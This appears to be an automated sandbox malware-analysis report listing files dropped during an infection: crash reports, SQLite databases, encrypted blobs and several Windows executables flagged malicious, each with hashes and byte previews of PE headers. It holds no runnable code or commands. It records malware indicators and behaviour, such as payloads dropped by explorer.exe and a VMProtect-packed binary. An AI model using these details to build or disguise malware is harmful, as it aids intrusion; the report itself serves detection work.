                                                                                                                                  Size (bytes):8386
                                                                                                                                  Entropy (8bit):3.699248408804388
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:Rrl7r3GLNiJF6N6YBSkSUmTmPgmfY3RS+GCpDk89bR3sf4Ybm:RrlsNib6N6YBhSUC+gmfY3RSoR8f4J
                                                                                                                                  MD5:AD2B946F2F4142ED74404845577170C9
                                                                                                                                  SHA1:D0BDBB8711ED1A90034E83F1D2EEC1DB82B14692
                                                                                                                                  SHA-256:D456EB771C9F39F823DFAA173066DD557B37A34989F0F5D3DD62774D1FC7EA03
                                                                                                                                  SHA-512:0AE571E09AB9BA82CBBFFE5F60479E4F1D88A95B173AFFA5D78F02B981DC43A6FC1C8B8A401CF5D63B8B6F6B6EF25845EA1BACF689F2EDDBF7A1E0CFF29F6814
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.1.3.2.<./.P.i.d.>.......
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):4683
                                                                                                                                  Entropy (8bit):4.480568114445589
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:cvIwSD8zsBrJgtWI9WByWgc8sqYjjT8fm8M4JCCdddja7Fn7+q8vedjaeXtlt1d:uITfj1BTgrsqYAJCVZKNe971d
                                                                                                                                  MD5:F54DF94C2147C6AC88D33F10F7959D90
                                                                                                                                  SHA1:270DF9F1C6B7819E9D001D6ACD92A1A46F3D911D
                                                                                                                                  SHA-256:E2015CBEC9658F8135B56EFDD57578C18838FE2598790409308D2879AC769D35
                                                                                                                                  SHA-512:E8E70D07914BF152FA97EC82EB1215D9369271603C34CA0D48463C4FB4105B4A9ED6E39836B021846D9F1B87A11E71973C9702397F01A40532E4FF329FC1B075
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1740377" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):8386
                                                                                                                                  Entropy (8bit):3.7009707298520187
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:Rrl7r3GLNiSu6Ia6YBSMSUCTmPgmfs3RS+GCpDg89bRCsfFbm:RrlsNiD6Ia6YBJSUm+gmfs3RS0RBfk
                                                                                                                                  MD5:5550EEBB27EB8880799F2CCA5398302F
                                                                                                                                  SHA1:B39E9913333727EC21F6E266B0E6FE82A28B37C0
                                                                                                                                  SHA-256:21C26B228D5523153419FC31B7BDC188FEC0276BE650DFA64C80D109D3F37E67
                                                                                                                                  SHA-512:5470167111172335B17F9087B515A8BBF92C0FDC4765BB19F1BEF477BBF2944CB1E3F96D8A23A390F5DCD4A2483BF8654AB43EDF7147CDA6D98755375B133D8E
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.1.8.8.<./.P.i.d.>.......
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):4683
                                                                                                                                  Entropy (8bit):4.4822263377295615
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:cvIwSD8zsBrJgtWI9WByWgc8sqYjH8fm8M4J17a7FK+q8vS7acZKBrd:uITfj1BTgrsqYAJQIKfcZKBrd
                                                                                                                                  MD5:9D5E471F72E7084F7355E531FC21AB13
                                                                                                                                  SHA1:E74858B9C82A8DFF326ECDFF81ADEC399A93E5B4
                                                                                                                                  SHA-256:7153FA9D20C8F620C918C0759347B8D5F290767BA6683259F348D9D20F62DF29
                                                                                                                                  SHA-512:49D391CE6B3A6712507EB53D97CDA3CF51DBEEE557E8622FC314C8F5753B9405330CFDFAEABA86274D99EF301B9E4B780EB22FC4FAE0A18AA30CE69AE6CC9FFB
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1740377" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Tue Oct 18 05:06:56 2022, 0x1205a4 type
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):41004
                                                                                                                                  Entropy (8bit):2.2994614483407765
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:SJBDS/nASHOipOAzAs7IHppA1eHDoca8dxkfz0hNkilyQXqK7AjFTb:yB+NsAMsk2OZ0ghCk6geFP
                                                                                                                                  MD5:87B8F1AABE9DC4A4266FFCECE740D649
                                                                                                                                  SHA1:5AA3199321354CEB80A249E981F918962D911BA4
                                                                                                                                  SHA-256:CB5D2782F7755727C1055C9CA535E21172C0EC0AC516C02510DFE8C3DD0E948B
                                                                                                                                  SHA-512:342AD6E2CD739418FEFF0E6ED217B26AB48AB44FD8BE9D3ABBB7337C0BDB9071A0858505CABCE26AB9E1CD271A85C1FBD796327A29766E2E24A9484A2812805C
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:MDMP....... .......p4Nc.........................................&..........T.......8...........T...............|............................................................................................U...........B......8.......GenuineIntelW...........T.......$...[4Nc............................. ..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Tue Oct 18 05:06:57 2022, 0x1205a4 type
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):46488
                                                                                                                                  Entropy (8bit):2.1671849341649634
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:n3i6HIHOAzasvLvIdta/TbMHxkV20hNkavwAOKjI49/2VHj:PAEva/oCthCIWj
                                                                                                                                  MD5:50A99458279B5187DB09B63AFB00AC53
                                                                                                                                  SHA1:D741ACBE15EEDDCC8B34E6FDF18A8059CC4DC3AB
                                                                                                                                  SHA-256:4656BF89189B7B414CCEB49C73A0629315B5069EB299D05322E62311753FE20E
                                                                                                                                  SHA-512:7292FDB0E4B156C57AE77933B586922CEFFDCF5BCBD1ADCD0D99010BC07E2F4903C693354D1533A5270CF28176F6FD4BF1EE2FB967536E75796588248AF8A8AB
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:MDMP....... .......q4Nc....................................D....(..........T.......8...........T...........................................................................................................U...........B......h.......GenuineIntelW...........T...........]4Nc............................. ..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:Unknown
                                                                                                                                  Category:modified
                                                                                                                                  Size (bytes):418816
                                                                                                                                  Entropy (8bit):6.905724524143702
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6144:o7qA7M1qVPQCssTSP+4eJmAON6qcgweh2QwbPqbYFt5y:ob7M1qVPQDX6ywPOE9y
                                                                                                                                  MD5:2D29421E985E4FB5F6ABB42FA3A502C1
                                                                                                                                  SHA1:0B9D7F7CAD88C5618C320B2603A5636891F4E80C
                                                                                                                                  SHA-256:DEDA980E424082BED5640A428A2024460B66BFA81EF168F317CBBEBBA0B8CB99
                                                                                                                                  SHA-512:E22392C93AF9B24F3EA276E3AB8EB9584A88794E6098376548B9BB18669B6024B5FA9FA7560EDD07F15F7E28FB37D1C4D62B7EDCEB1F259D30783D93482F5FBA
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R..O<D.O<D.O<D.$?E.O<D.$9E7O<D.$8E.O<D.$=E.O<D.O=D.O<D.58E.O<D.5?E.O<D.59E.O<D.55E.O<D.5>E.O<DRich.O<D................PE..L...~.Mc............... .*...D.......}.......@....@.......................................@.....................................(............................p..........................................@............@..8............................text...w).......*.................. ..`.rdata.......@......................@..@.data...8E... ...8..................@....reloc.......p.......F..............@..B........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:Unknown
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):753664
                                                                                                                                  Entropy (8bit):7.831987614297561
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12288:190wzR6RuBNzRZsmpwkhBWVfl17qukdXfg/EPYge+c4U+yLti:1uWou/PEYBs3Gu4Xfg/ENJUP0
                                                                                                                                  MD5:36FC2440660C5F4509C3ABCDDE9A1C3A
                                                                                                                                  SHA1:23B9D0FE11194E29394BEEDDDFD462225AF5118E
                                                                                                                                  SHA-256:78F55FD75A0E521099C5F29BC271195D0AC94FBD3A5332B022EAE4F0F304DF2D
                                                                                                                                  SHA-512:C77645C4FCC5C41129D6528D768919C0B470840417A49A0FB899E30740BAE25FF5819FAB37D765DB1A5B86406343B561A8E03AA0033CF44A0AFAE711D3F4F025
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Tv..:%..:%..:%...%..:%...%..:%..A%..:%..;%9.:%...%..:%...%..:%...%..:%Rich..:%................PE..L...z..`.....................z....................@..........................`!.................................................(.....!..K..........................................................@9..@...............(............................text............................... ..`.data... ........>..................@....rsrc....K....!..L...4..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:Unknown
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):221696
                                                                                                                                  Entropy (8bit):6.956307856034634
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3072:odA5Hwr1mBa2jIvgLL3APaN4Ii+WCF4BmbnXoLnkzzsPyVSl7obwqxKDYow:oi5Qd2k2L3ACN4I+Bsinmzs+WywqED
                                                                                                                                  MD5:BD0DFD6CBAE2B012D4A5F155D10ED054
                                                                                                                                  SHA1:83A8CB5B61FCAFBDFD9BFF2B0CC8C8C39F5437AD
                                                                                                                                  SHA-256:BD2433BEDDEFCCCA8BF3539FC8E5A354E988CD2A3C3AF9A27F4A3BBE4ED40731
                                                                                                                                  SHA-512:01FBC67A42B43FA7EE6E1816D44D9BD1A40672AE814F1756C79D0F7CCC2198DCC109719AF85ED887B337DF5E48504402958EE15A6420EC01533584B545E32C7E
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Tv..:%..:%..:%...%..:%...%..:%..A%..:%..;%..:%...%..:%...%..:%...%..:%Rich..:%........PE..L...:QKa.....................X....................@..........................0......<.......................................|...(........K..........................................................09..@............................................text............................... ..`.data...@........"..................@....rsrc....K.......L..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):49152
                                                                                                                                  Entropy (8bit):0.7876734657715041
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                                                                  MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                                                                  SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                                                                  SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                                                                  SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:Unknown
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):223744
                                                                                                                                  Entropy (8bit):6.9681097133871965
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3072:XbAdHw+1mHfu461Pg4LBMpComz+CFnEHa1c6s1iVs61k9mzadH71jZ+eEoql+cb:XUdliuR1RLBOCo/FcU9mzgb1jZ+/l+
                                                                                                                                  MD5:D878530A6E5C388668853A620D1B6E05
                                                                                                                                  SHA1:5B2E2C6B4B2961A7576E85E746F5F92BA6B59063
                                                                                                                                  SHA-256:266F0DD2D6D365F8A75D5740FCBEDA3A95827C024A5E82136DCAD622F54385FC
                                                                                                                                  SHA-512:2B1D1604356C3B922B124EA30A14892D00E847E349052577AA29ED5BD110FFB82C3BC9596215580567BE7503855915069206A67E70670F17CF8335143909899A
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Tv..:%..:%..:%...%..:%...%..:%..A%..:%..;%..:%...%..:%...%..:%...%..:%Rich..:%........PE..L....l.a.....................^....................@..........................@...... .......................................|...(........K..........................................................09..@............................................text............................... ..`.data............*..................@....rsrc....K.......L..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:Unknown
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):354304
                                                                                                                                  Entropy (8bit):6.972522186856824
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6144:Yu+08mgVzelSoAcx+semmAOkrWsaeFN+liI/D0FXLzC8LYP4dJ+mZy:YA8mgVzelkmCsaeoijt/CWYP4dJ+sy
                                                                                                                                  MD5:3A26E150EA47AD36BFF254227086F2D6
                                                                                                                                  SHA1:70984C8CB10C99FD22C65BAFA64AB574D1AB3270
                                                                                                                                  SHA-256:BDEE2F20451B6F0CAECEC651AE8C8230E72445353E523B27305142452BE057E6
                                                                                                                                  SHA-512:9151B2F5D94E350F6EBCA5EB07E366B0D18C90492D54A3832F70D323ACEEED32D6D31EFC784E8E6D61815BEA7EAAF3179357B1E68266DDBECE810F26FB5467B0
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R..O<D.O<D.O<D.$?E.O<D.$9E7O<D.$8E.O<D.$=E.O<D.O=D.O<D.58E.O<D.5?E.O<D.59E.O<D.55E.O<D.5>E.O<DRich.O<D................PE..L...U.Mc............... .*...H.......}.......@....@.......................................@.....................................(............................p..........................................@............@..8............................text...w).......*.................. ..`.rdata.......@......................@..@.data...@I... ...<..................@....reloc.......p.......J..............@..B........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:Unknown
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):223744
                                                                                                                                  Entropy (8bit):6.9681097133871965
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3072:XbAdHw+1mHfu461Pg4LBMpComz+CFnEHa1c6s1iVs61k9mzadH71jZ+eEoql+cb:XUdliuR1RLBOCo/FcU9mzgb1jZ+/l+
                                                                                                                                  MD5:D878530A6E5C388668853A620D1B6E05
                                                                                                                                  SHA1:5B2E2C6B4B2961A7576E85E746F5F92BA6B59063
                                                                                                                                  SHA-256:266F0DD2D6D365F8A75D5740FCBEDA3A95827C024A5E82136DCAD622F54385FC
                                                                                                                                  SHA-512:2B1D1604356C3B922B124EA30A14892D00E847E349052577AA29ED5BD110FFB82C3BC9596215580567BE7503855915069206A67E70670F17CF8335143909899A
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Tv..:%..:%..:%...%..:%...%..:%..A%..:%..;%..:%...%..:%...%..:%...%..:%Rich..:%........PE..L....l.a.....................^....................@..........................@...... .......................................|...(........K..........................................................09..@............................................text............................... ..`.data............*..................@....rsrc....K.......L..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:Unknown
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):3633152
                                                                                                                                  Entropy (8bit):7.795279381343742
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:98304:BExqImDF2tR+HngGnD35oiKx3Qnf1tNkTXaKaCmYkuBzM:wqY+HgGnD35o78NWKZuBzM
                                                                                                                                  MD5:D30C815C9E13D428430F2A8B4018D3D5
                                                                                                                                  SHA1:49BFDFA3B51BEFED67FE058D1A9E9CC7D1FEA579
                                                                                                                                  SHA-256:2A1E2D1A6BADFD7B0C914CE0554786FEA79E32DEAA0FF77D8DC703E8EEDD2A9F
                                                                                                                                  SHA-512:D6D12E13524E676463C230A7D9B620523550CEC37CFF7E7CA560670FCA86C68EB4E190E2C0C4301E436AE8DBD86038453B4D70140EFF5A751E52A165C6D2A3C5
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....gMc..........#......"..........X.)........@..............................`........... ...................................................L..............R`.P.............................................).0....Q`.0............ G..............................text....!.......................... ..`.rdata......@......................@..@.data..............................@....pdata..H...........................@..@_RDATA..............................@..@.vmp0....F... ......................`..`.vmp1....k7..p)..l7.................`..h........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 10
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):28672
                                                                                                                                  Entropy (8bit):0.4393511334109407
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:24:TLqlj1czkwubXYFpFNYcw+6UwcYzHrSl:TyxcYwuLopFgU1YzLSl
                                                                                                                                  MD5:8C31C5487A97BBE73711C5E20600C1F6
                                                                                                                                  SHA1:D4D6B04226D8FFC894749B3963E7DB7068D6D773
                                                                                                                                  SHA-256:A1326E74262F4B37628F2E712EC077F499B113181A1E937E752D046E43F1689A
                                                                                                                                  SHA-512:394391350524B994504F4E748CCD5C3FA8EF980AED850A5A60F09250E8261AC8E300657CBB1DBF305729637BC0E1F043E57799E2A35C82EEA3825CE5C9E7051D
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):94208
                                                                                                                                  Entropy (8bit):1.287139506398081
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:Qo1/8dpUXbSzTPJPF6n/YVuzdqfEwn7PrH944:QS/indc/YVuzdqfEwn7b944
                                                                                                                                  MD5:292F98D765C8712910776C89ADDE2311
                                                                                                                                  SHA1:E9F4CCB4577B3E6857C6116C9CBA0F3EC63878C5
                                                                                                                                  SHA-256:9C63F8321526F04D4CD0CFE11EA32576D1502272FE8333536B9DEE2C3B49825E
                                                                                                                                  SHA-512:205764B34543D8B53118B3AEA88C550B2273E6EBC880AAD5A106F8DB11D520EB8FD6EFD3DB3B87A4500D287187832FCF18F60556072DD7F5CC947BB7A4E3C3C1
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:Unknown
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):248887
                                                                                                                                  Entropy (8bit):7.999285782902131
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:6144:3LBy5KggJHsYnWLCSyFSvycqW775svTawAG9NmDuzoBX+:3t0KPHLLSWS6E79wRNsy6X+
                                                                                                                                  MD5:8B6465234B36FC259DE12E2B10C498AF
                                                                                                                                  SHA1:2E0C29A9FA417E4589C26DFFD7AD7427951F6C1C
                                                                                                                                  SHA-256:3A2EA29BAEC810BCCE49203707627DF24EE0F4D5CA9093451B2ED3ABF79817C7
                                                                                                                                  SHA-512:F606B133EB27280AF69F1CB4F2F67517826A5634370917AB623755F395709928717326F16387AD593A2298C1FD0C23AADD6E6E888830A0BE43DDC801CB26E4A1
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:.W..G.$.|...y.4<.R..P-&.\..,.bC|=.,X.x....0.-L$...gJ.~.."Z...'5...&.6......=...?B...f`.6Q..W..(....a%...+h.Wt|.".zoum....E....~F..V3....4.m.}/oZ..W.^..Z....G.CV..Iodv...P..%....@..).Bp..6..D..]....t.._@8@.eB...J..).gWl.8`).$.D...>*EA3K...*{cI.dNL..F...%-..#.3m......H"&..J0...VY.."......Fh..>.v.....!d.d0]6...+L....Q..~|...i....9....^.....s:zd...c....A=...8..^b..z...........em/8OE.|H.sQ.m.F.......Vg._.K......F]'$.Y.C.SM2../v..S.tQ.d......_..(-...AAW.O?..4Y....M..#Y.\@.mZ6...S..y`C/#C;b...;]....Ny`R...s......j./%..29..5.M.....Mc.{2./.Sr.......S..1.'E.WXg..(...B.4m.l.2.j.`...K:...<..]....!......Z..v...."9...Cz.........I.N.P....oC..W._Sl..Fm.>9....j....~..w\.$6|?.pkz..p.V..RR[..2|.ya..|.6.$......,.J....k.w\.|t}.. .....X.!>5..J..9........f:..H6.c.).E..1.O|[dxT..W..dv..2..UR........4.../...-..u. ..)|J.dS..N\1".@.....<..h.oD%.........CE.b.F..e.]W(.......;._L.p.o\.7..../.;R....q..m....F.'._d.+.H{dz..o._.........b......-.Dk.M..9..`..w;.Y..
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:Unknown
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):160970
                                                                                                                                  Entropy (8bit):7.9988713701377545
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:3072:4AMFkVHwvRo9yPxoiole3r9PsMFGcxC9s1HiEc4lINsB0W:Zgkq+901rbxC9GHiZyqW
                                                                                                                                  MD5:94346B0AAD5787E1B558F9E33272F4C2
                                                                                                                                  SHA1:E9B6DAFC38365F7BB985AC0191BA579CF394F649
                                                                                                                                  SHA-256:FFC5A52C1862B58C3536C360A0723EA7B3647508D60B8DA6030B810268F8A15E
                                                                                                                                  SHA-512:F34B9443A9B031E0AC25ED9E719FEC269A53B3D4B3871C9617B9DE5924C303BD61FFC9E312A7BB153F39A0338BC5789B024E53A308B2DF85411A03D6564247D3
                                                                                                                                  Malicious:false
